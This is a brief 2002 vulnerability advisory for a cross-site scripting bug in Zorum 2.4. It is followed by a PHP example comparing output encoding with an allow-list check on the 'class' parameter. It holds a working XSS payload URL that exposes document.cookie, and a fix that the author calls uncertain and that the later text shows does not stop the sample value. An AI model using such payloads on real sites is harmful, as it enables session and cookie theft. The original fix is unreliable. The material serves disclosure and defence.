
XSS bug in Zorum 2.4

by Nikola Strahija on October 11th, 2002

Vulnerable systems: Zorum 2.4


Exploit:
z_user_show.php?method=showuserlink&class=javascript:alert(document.cookie)&rollid=admin&x=3da59a9da8825&

(without "*")

Solution:
I think that will work, but I'm not sure.

Open dbtreelistproperty_method.php and put this code in line 7:

$class = HTMLSpecialChars($class);

I'm a beginner PHP developer, sorry :)

----------------------------------
Arab Vieruz
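
The fix above encodes HTML metacharacters, which helps when the value lands in HTML text or a quoted attribute, but the advisory's sample value contains none of those characters and passes through unchanged. The PHP below is an added example, not code from Zorum or from the original advisory; it assumes `class` is meant to be a plain identifier, and the function names and sample inputs are constructed for illustration.

```php
<?php
// Added example, not Zorum code. Assumption: `class` is expected to be a
// plain identifier; the page does not show where Zorum reflects the value.

// Constructed sample inputs for the `class` request parameter.
$samples = [
    'user',                               // ordinary identifier
    'javascript:alert(document.cookie)',  // value from the advisory
    '"><b>x</b>',                         // HTML metacharacters
];

// Output encoding, as in the advisory's fix. Flags and charset are set
// explicitly because the default flags changed in PHP 8.1.
function encode_for_html(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
}

// Hypothetical allow-list check: accept only identifier-shaped values
// (letters, digits, underscore, at most 64 characters).
function is_valid_class_param(string $value): bool
{
    return preg_match('/\A[A-Za-z_][A-Za-z0-9_]{0,63}\z/', $value) === 1;
}

// Show, per input, whether encoding altered it and whether the
// allow-list would accept it.
foreach ($samples as $raw) {
    $encoded = encode_for_html($raw);
    printf(
        "%-36s encoded=%-50s changed=%s valid=%s\n",
        $raw,
        $encoded,
        $encoded === $raw ? 'no' : 'yes',
        is_valid_class_param($raw) ? 'yes' : 'no'
    );
}
```

Rejecting the request when the allow-list check fails, and still encoding on output, covers both the metacharacter case and the scheme-style value.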

